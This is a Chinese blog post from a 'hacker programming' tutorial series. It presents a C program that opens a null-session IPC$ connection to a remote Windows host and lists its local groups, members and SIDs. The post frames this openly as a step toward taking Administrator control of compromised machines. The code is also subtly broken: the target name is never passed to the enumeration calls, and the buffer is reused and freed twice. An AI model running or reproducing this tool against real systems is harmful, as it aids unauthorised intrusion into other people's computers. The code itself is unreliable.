黑客编程教程(十二)取得系统用户权限 

我们要取得肉鸡的控制权,首先必须有Administrator权限,获得权限的途径很多都是通过IPC$破解来获得用户密码. 
 

我们看一下代码:

 

#include <windows.h>

#include <stdio.h>

#include <lm.h>

 

#pragma comment (lib, "Mpr.lib")

#pragma comment (lib, "Netapi32.lib")

 

void getuser(char *);

 

void main( int argc, char *argv[ ] )

{            //空用户名和密码

DWORD ret;

char username[100] = "", password[100] = "";

char server[100] = "", ipc[100] = "";

NETRESOURCE NET;

 

if (argc == 1) 

{ 

exit(1);

}

 

strncpy(server,argv[1],100); 

printf("server: %s\n", server);

 

sprintf(ipc,"\\\\%s\\ipc$",server);

 

NET.lpLocalName = NULL;

NET.lpProvider = NULL;

NET.dwType = RESOURCETYPE_ANY;

NET.lpRemoteName = (char*)&ipc;

 

printf("setting up session... ");

ret = WNetAddConnection2(&NET,(const char *)&password,(const char *)&username,0);

                                                                          //建立空连接

if (ret != ERROR_SUCCESS)

{

printf("IPC$ connect fail.\n");

exit(1);

}

else 

printf("IPC$ connect success.\n");

getuser((char*)&server);

 

printf("Disconnect Server... ");

ret = WNetCancelConnection2((char*)&ipc,0,TRUE);                     //断开IPC连接

if (ret != ERROR_SUCCESS)

{

printf("fail.\n");

exit(1);

}

else

printf("success.\n");

exit (0);

}

 

void getuser(char *server)                       //取得用户的函数

{

DWORD ret, read, total, resume = 0;

int i;

LPVOID buff;

char comment[255];

wchar_t wserver[100];

 

do

{

ret = NetLocalGroupEnum(wserver, 1, (unsigned char **)&buff, MAX_PREFERRED_LENGTH, &read, &total, &resume);

 

if (ret != NERR_Success && ret != ERROR_MORE_DATA) 

{

printf("fail\n");

break;

} 

PLOCALGROUP_INFO_1 info = (PLOCALGROUP_INFO_1) buff;

 

for (i=0; i<read; i++) 

{

printf("GROUP: %S\n",info[i].lgrpi1_name);

 

WideCharToMultiByte(CP_ACP, 0, info[i].lgrpi1_comment , -1, comment,255,NULL,NULL); 

printf("\tCOMMENT: %s\n",comment);

 

DWORD ret, read, total, resume = 0;

ret = NetLocalGroupGetMembers((const unsigned short*)&wserver, info[i].lgrpi1_name, 2, (unsigned char **)&buff, 1024, &read, &total, &resume);

 

if (ret != NERR_Success && ret != ERROR_MORE_DATA) 

{

printf("fail\n");

break;

} 

 

PLOCALGROUP_MEMBERS_INFO_2 info = (PLOCALGROUP_MEMBERS_INFO_2) buff;

 

for (unsigned i=0; i<read; i++) 

{

printf("\t\t%S\n", info[i].lgrmi2_domainandname);

printf("\t\t\tSID:%d\n", info[i].lgrmi2_sid);

printf("\t\t\tSIDUSAGE:%d\n",info[i].lgrmi2_sidusage);

}

NetApiBufferFree (buff);

}

 

NetApiBufferFree (buff);

 

} 

while (ret == ERROR_MORE_DATA );

}

 

posted @ 2013-07-17 13:41  如.若  阅读(740)  评论(0编辑  收藏  举报